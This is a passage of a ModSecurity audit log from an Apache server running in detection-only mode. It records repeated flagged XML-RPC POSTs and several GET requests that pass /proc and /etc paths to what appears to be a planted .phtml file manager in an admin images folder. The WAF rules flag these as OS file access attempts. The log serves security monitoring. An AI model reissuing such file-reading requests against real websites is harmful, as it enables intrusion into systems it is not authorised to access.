wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_560621535d10736b319d2788e490c0%7C%7C1750293288%7C%7C1750289688%7C%7C0d1589bbd31ed3a054a3d82c3f502bd9; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=4418c3219e0f9e8d94c615b61cf0730d%7C%7C1750293288%7C%7C1750289688%7C%7C60a65cf0ccf5295a19e8d9d545b403ba User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --a695fa46-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=11h5bnivk0fd3hcoojqfv35hpv; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_8d19cd3aa899f2c06cc7471d471564%7C%7C1750293289%7C%7C1750289689%7C%7Cec80b9a3c964336ba5a3445a319d9eba; expires=Thu, 19 Jun 2025 00:34:49 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=b6419fc3c238a725e5da9c48933b573f%7C%7C1750293290%7C%7C1750289690%7C%7C7febb91cf1accf4d64f38d1291808165; expires=Thu, 19 Jun 2025 00:34:50 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a695fa46-E-- --a695fa46-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC4KdyZ4SMykfn97vzA6gAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750120489107794 1083735 (- - -) Stopwatch2: 1750120489107794 1083735; combined=3191, p1=427, p2=2347, p3=110, p4=39, p5=169, sr=99, sw=99, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a695fa46-Z-- --efcbc420-A-- [17/Jun/2025:06:05:50.720500 +0530] aFC4ZVJfblPUQiSn5r2bTQAAAAA 146.190.105.35 33818 127.0.0.1 7081 --efcbc420-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 Cookie: PHPSESSID=l26mgj59o37nk70s9cg797u5c8; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_0ce9c2b78c8ea051f1c35f7ad77f09%7C%7C1750293349%7C%7C1750289749%7C%7C8bb353fbef2c1bc9f56919ffa8668782; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=58ce8c37020ddf5c9f5bd218c81dd419%7C%7C1750293349%7C%7C1750289749%7C%7Ca58262a06b134be0983d8bc895f2c362 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --efcbc420-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=mt4n5cmtili6dh8jd7hh9h84p6; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_8cfc18e41060fad5b9a89c394ef9fa%7C%7C1750293350%7C%7C1750289750%7C%7C63c7e024eecc481b163af3b022a10f00; expires=Thu, 19 Jun 2025 00:35:50 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=50534b50448b9531f1e6024d818b6a47%7C%7C1750293350%7C%7C1750289750%7C%7Cc93c63087b04e741ac03c740780f25e3; expires=Thu, 19 Jun 2025 00:35:50 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --efcbc420-E-- --efcbc420-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC4ZVJfblPUQiSn5r2bTQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750120549676458 1044128 (- - -) Stopwatch2: 1750120549676458 1044128; combined=2947, p1=365, p2=2120, p3=108, p4=39, p5=190, sr=90, sw=125, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --efcbc420-Z-- --0fb36453-A-- [17/Jun/2025:06:06:48.832036 +0530] aFC4oFJfblPUQiSn5r2bewAAAAA 216.73.216.240 33320 127.0.0.1 7081 --0fb36453-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Finit.d%2Fplymouth HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --0fb36453-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3672 Connection: close Content-Type: text/html; charset=UTF-8 --0fb36453-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/plymouth"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC4oFJfblPUQiSn5r2bewAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /proc/thread-self/root/etc/init.d/plymouth"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC4oFJfblPUQiSn5r2bewAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120608827364 4728 (- - -) Stopwatch2: 1750120608827364 4728; combined=2616, p1=385, p2=2058, p3=43, p4=39, p5=91, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0fb36453-Z-- --a507da2f-A-- [17/Jun/2025:06:06:50.898859 +0530] aFC4odyZ4SMykfn97vzBRwAAAAs 146.190.105.35 59024 127.0.0.1 7081 --a507da2f-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 Cookie: PHPSESSID=tj74vm077gu8vit1dkrofp9bpo; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_b135444e3a677b1c7f9968d37d3e9c%7C%7C1750293409%7C%7C1750289809%7C%7C48218c99c5fb3ca875e9a47d656e30d5; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=cd16301c9aed27e320c24c5a53290ce2%7C%7C1750293409%7C%7C1750289809%7C%7Cf9662be24e9df3e24321fb869675d265 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --a507da2f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=k0ei34fv04gvgb0t57diuutpn3; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_7a8979f0a37deb3f3151cdaaf58258%7C%7C1750293410%7C%7C1750289810%7C%7Cadc0079ff74cdadb9ecda62e37cc6f4b; expires=Thu, 19 Jun 2025 00:36:50 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=4f672a2239d51d864fa094d747e6f107%7C%7C1750293410%7C%7C1750289810%7C%7Cebb886861e610e852bc32fa47b78de06; expires=Thu, 19 Jun 2025 00:36:50 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a507da2f-E-- --a507da2f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC4odyZ4SMykfn97vzBRwAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750120609861123 1037814 (- - -) Stopwatch2: 1750120609861123 1037814; combined=3039, p1=386, p2=2122, p3=89, p4=37, p5=232, sr=91, sw=173, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a507da2f-Z-- --370eaf46-A-- [17/Jun/2025:06:06:51.745002 +0530] aFC4o2j9J38fG6WAr4ph7wAAAAk 216.73.216.240 59264 127.0.0.1 7081 --370eaf46-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F144 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --370eaf46-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --370eaf46-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/144"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/144"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC4o2j9J38fG6WAr4ph7wAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120611740854 4207 (- - -) Stopwatch2: 1750120611740854 4207; combined=2163, p1=368, p2=1655, p3=38, p4=34, p5=67, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --370eaf46-Z-- --13b1130c-A-- [17/Jun/2025:06:07:50.443678 +0530] aFC43YiFNOCfBactc_VFNQAAAAE 146.190.105.35 41708 127.0.0.1 7081 --13b1130c-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 495 Cookie: PHPSESSID=mu4g1v29q1plec9ph7ftrpch7b; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_2245bbb51ebce3bcb418012d9bf603%7C%7C1750293468%7C%7C1750289868%7C%7Cc2d2422dd974db9495d94ab6ad21856f; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=40142f491ae2018df065e361fbd02d1a%7C%7C1750293468%7C%7C1750289868%7C%7Ce2e276846d99352db51493e04f159639 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --13b1130c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=pif8su8blae7saqjkq5g75omcv; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_792f73ad5a349e028c69dd0159bdb7%7C%7C1750293470%7C%7C1750289870%7C%7Cd7ccf1a4ecc11f857f6fd0efccc42384; expires=Thu, 19 Jun 2025 00:37:50 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=949a6dd62ef162e9fe119470a3367974%7C%7C1750293470%7C%7C1750289870%7C%7C7602637324d46aa59d5cb1382025e90c; expires=Thu, 19 Jun 2025 00:37:50 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --13b1130c-E-- --13b1130c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFC43YiFNOCfBactc_VFNQAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750120669264785 1178981 (- - -) Stopwatch2: 1750120669264785 1178981; combined=2866, p1=400, p2=2066, p3=107, p4=36, p5=160, sr=92, sw=97, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --13b1130c-Z-- --5e439c67-A-- [17/Jun/2025:06:07:50.722766 +0530] aFC43ooVQnPDyHnl9oPdqwAAAAY 216.73.216.240 46422 127.0.0.1 7081 --5e439c67-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Fapt%2Fapt.conf.d&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fetc%2Fapt%2Fapt.conf.d%2F20packagekit HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --5e439c67-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3407 Connection: close Content-Type: text/html; charset=UTF-8 --5e439c67-H-- Message: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:path: /proc/thread-self/root/etc/apt/apt.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:viewfile: /proc/thread-self/root/etc/apt/apt.conf.d/20packagekit"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:path: /proc/thread-self/root/etc/apt/apt.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC43ooVQnPDyHnl9oPdqwAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apt/apt.conf found within ARGS:viewfile: /proc/thread-self/root/etc/apt/apt.conf.d/20packagekit"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC43ooVQnPDyHnl9oPdqwAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120670718801 4018 (- - -) Stopwatch2: 1750120670718801 4018; combined=2207, p1=442, p2=1618, p3=36, p4=29, p5=82, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5e439c67-Z-- --3df7eb1c-A-- [17/Jun/2025:06:07:55.638863 +0530] aFC44wBFs81uFEfQOXadlgAAAAM 216.73.216.240 47018 127.0.0.1 7081 --3df7eb1c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F105 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --3df7eb1c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --3df7eb1c-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/105"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/105"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC44wBFs81uFEfQOXadlgAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120675634220 4697 (- - -) Stopwatch2: 1750120675634220 4697; combined=2340, p1=349, p2=1860, p3=37, p4=35, p5=59, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3df7eb1c-Z-- --27c01570-A-- [17/Jun/2025:06:07:56.275352 +0530] aFC45ABFs81uFEfQOXadlwAAAAM 216.73.216.240 47104 127.0.0.1 7081 --27c01570-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F145 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --27c01570-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --27c01570-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/145"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/145"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC45ABFs81uFEfQOXadlwAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120676270951 4455 (- - -) Stopwatch2: 1750120676270951 4455; combined=2399, p1=359, p2=1907, p3=38, p4=36, p5=59, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --27c01570-Z-- --6f96f206-A-- [17/Jun/2025:06:08:01.557765 +0530] aFC46QJ4p5Cdblnjra6CKwAAAAI 216.73.216.240 58090 127.0.0.1 7081 --6f96f206-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F98 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --6f96f206-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --6f96f206-H-- Message: Warning. Matched phrase "proc/self/fd/9" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/9 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/98"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/9" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/9 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/98"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC46QJ4p5Cdblnjra6CKwAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120681552791 5027 (- - 